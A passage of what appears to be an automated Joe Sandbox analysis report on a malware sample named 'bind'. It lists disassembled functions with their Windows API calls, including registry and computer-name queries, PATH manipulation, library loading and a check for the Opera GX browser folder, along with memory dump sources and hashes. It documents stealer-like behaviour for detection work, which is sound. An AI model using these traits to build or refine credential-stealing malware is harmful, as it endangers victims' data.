                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,00352F7B,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,00361678,00000000,?), ref: 0034EA47
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3466090806-0
                                                                                                                                                                                      • Opcode ID: 380f67f229a4408b397c042020c93a18c9bf2947edf23cc2067672a93b0ea547
                                                                                                                                                                                      • Instruction ID: 7b72410c4c2580dd17f79106afaf086923160baee84a7b0a5efc7e3fccfb0097
                                                                                                                                                                                      • Opcode Fuzzy Hash: 380f67f229a4408b397c042020c93a18c9bf2947edf23cc2067672a93b0ea547
                                                                                                                                                                                      • Instruction Fuzzy Hash: 68F03AB6240208BFEB11DBD1DC0AFAE7A7DFB84745F104024F706A51A0D6B19A919B20
                                                                                                                                                                                      Function 00346CB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91libraryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?), ref: 00346CCC
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034E5F1: lstrlenA.KERNEL32(?,0000000C,?,003545F8,0035E266,0035E266,00000000,0000000C,00000000,?,00355A8E), ref: 0034E5FA
                                                                                                                                                                                        • Part of subcall function 0034E5F1: lstrcpyA.KERNEL32(00000000,00000000,?,003545F8,0035E266,0035E266,00000000,0000000C,00000000,?,00355A8E), ref: 0034E62E
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                      • SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,003613F8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0035E266), ref: 00346D30
                                                                                                                                                                                      • LoadLibraryA.KERNEL32 ref: 00346D44
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00346CC0, 00346CC5, 00346CDF
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                      • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                                      • API String ID: 2929475105-2812842227
                                                                                                                                                                                      • Opcode ID: cb23ae53be02da73f94be8a8d7ac00d40ce8c00c1a900d8b59de7026f1990dca
                                                                                                                                                                                      • Instruction ID: fc950920b3043d35903b0f8161fd38dac21bd2fbec484f45ca5026bf2ddb821a
                                                                                                                                                                                      • Opcode Fuzzy Hash: cb23ae53be02da73f94be8a8d7ac00d40ce8c00c1a900d8b59de7026f1990dca
                                                                                                                                                                                      • Instruction Fuzzy Hash: 76315D71815120EBCB12EFE0ED028AE7BB4FB157187168176F402A9071EBB16A52CBA1
                                                                                                                                                                                      Function 0035165F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _EH_prolog.MSVCRT ref: 00351664
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00351681
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0035171D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: H_prologlstrlen
                                                                                                                                                                                      • String ID: ERROR
                                                                                                                                                                                      • API String ID: 2133942097-2861137601
                                                                                                                                                                                      • Opcode ID: 264c183f3c4f5cec076075b766455ad4b51c564c8c894a7ea2c0a35a390ecdb9
                                                                                                                                                                                      • Instruction ID: 4c72a2a8667c6c92bcff5fbc40b3759a1b219b344d78ec67dec8fc1cdf0573ce
                                                                                                                                                                                      • Opcode Fuzzy Hash: 264c183f3c4f5cec076075b766455ad4b51c564c8c894a7ea2c0a35a390ecdb9
                                                                                                                                                                                      • Instruction Fuzzy Hash: 50214F71900204ABCB02FFB8DC46E9E7BB8FF15354F448465F9019F2A2EA34EA45CB91
                                                                                                                                                                                      Function 0034E816 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22memoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0034104D,HAL9TH,003555D9), ref: 0034E822
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,0034104D,HAL9TH,003555D9), ref: 0034E829
                                                                                                                                                                                      • GetComputerNameA.KERNEL32(00000000,?), ref: 0034E83D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                      • String ID: f5
                                                                                                                                                                                      • API String ID: 4203777966-2543225189
                                                                                                                                                                                      • Opcode ID: 4c14caf83f055d1942d0cf41b2c1014fe0c042b79083cc9a07f6cf6ff57f2e12
                                                                                                                                                                                      • Instruction ID: 3c8216d92f019dd1d60980ff9b32c1646f13298311554b396a37504299a82d31
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c14caf83f055d1942d0cf41b2c1014fe0c042b79083cc9a07f6cf6ff57f2e12
                                                                                                                                                                                      • Instruction Fuzzy Hash: 09E08CB6300304ABE7159BAADC4DE8A7ABCEB84B52F000065F605C71A0EAF09A048670
                                                                                                                                                                                      Function 61E541A0 Relevance: 6.8, APIs: 2, Strings: 2, Instructions: 772stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: strcmp$free
                                                                                                                                                                                      • String ID: @$rnal
                                                                                                                                                                                      • API String ID: 3401341699-826727331
                                                                                                                                                                                      • Opcode ID: 34681a6ed3c312869e26ecab14944f65220985f5c3d5f157ec6c138c97cab9a7
                                                                                                                                                                                      • Instruction ID: 0ce42be2a52064457b78e7c31244c3f07411abd0ae8e299ce13c5538bbb98839
                                                                                                                                                                                      • Opcode Fuzzy Hash: 34681a6ed3c312869e26ecab14944f65220985f5c3d5f157ec6c138c97cab9a7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 70822470A04259CFEB60CF68C880B89BBF1BF45308F2481EAD8589B352E775D9A5CF51
                                                                                                                                                                                      Function 003526F8 Relevance: 6.1, APIs: 4, Instructions: 79sleepsynchronizationthreadCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,00361678,003613FC,00361ECC), ref: 0035276D
                                                                                                                                                                                      • _MSFOpenExW.MSPDB140-MSVCRT ref: 003527A0
                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0035165F,?,00000000,00000000), ref: 003527B5
                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003527BD
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateObjectOpenSingleSleepThreadWait
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1990444757-0
                                                                                                                                                                                      • Opcode ID: 964d7eb538befa0e4e462066be37c1497f34cf50d4d340da1877c4af9dcd7fbd
                                                                                                                                                                                      • Instruction ID: cdf467b974baacf75c4156c501bdb7eb6910ba41f0eb2d3bb60021f208aad152
                                                                                                                                                                                      • Opcode Fuzzy Hash: 964d7eb538befa0e4e462066be37c1497f34cf50d4d340da1877c4af9dcd7fbd
                                                                                                                                                                                      • Instruction Fuzzy Hash: DE212E71901208EBCB12EFA5DD85DEE7BBCFF19311F504126FD069A161EB30AA49CB90
                                                                                                                                                                                      Function 0034C5E4 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 321COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,Opera GX,0035E266,0035E266,?,?), ref: 0034C619
                                                                                                                                                                                        • Part of subcall function 0034F83B: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0034F869
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                        • Part of subcall function 0034F80B: GetFileAttributesA.KERNEL32(00000000,?,?,0034AF28,?), ref: 0034F818
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                                                                                                                      • String ID: Opera GX$f5
                                                                                                                                                                                      • API String ID: 1719890681-685903615
                                                                                                                                                                                      • Opcode ID: 3522518964456d27d83d55209196aeb3e3ced08c8814256e633ff02e8db4af87
                                                                                                                                                                                      • Instruction ID: 0c6af45f73f33d8d5a4eccb3cb57c6e360559ed0aaa8fd5cfce9d2fe7d46680a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3522518964456d27d83d55209196aeb3e3ced08c8814256e633ff02e8db4af87
                                                                                                                                                                                      • Instruction Fuzzy Hash: 07B1C672900108AADF16FBA4D992DEE77BCBF15304F510526F502BE091FE35BB09CAA5
                                                                                                                                                                                      Function 61E4928D Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 309fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                      • String ID: exclusive$winOpen
                                                                                                                                                                                      • API String ID: 823142352-1568912604
                                                                                                                                                                                      • Opcode ID: ff90b5ff9f65aa81a6cf32d7345712a6d06921c8ce447e6fe5c06270544096a6
                                                                                                                                                                                      • Instruction ID: ddd978882cd5270fa8f94071a9300b4b805ea89cb158bd2aa8a7dfbc70792811
                                                                                                                                                                                      • Opcode Fuzzy Hash: ff90b5ff9f65aa81a6cf32d7345712a6d06921c8ce447e6fe5c06270544096a6
                                                                                                                                                                                      • Instruction Fuzzy Hash: B4D1A2709047499FDB10DFA9D58478EBBF0AF88318F208929E868EB394E774D985CF41
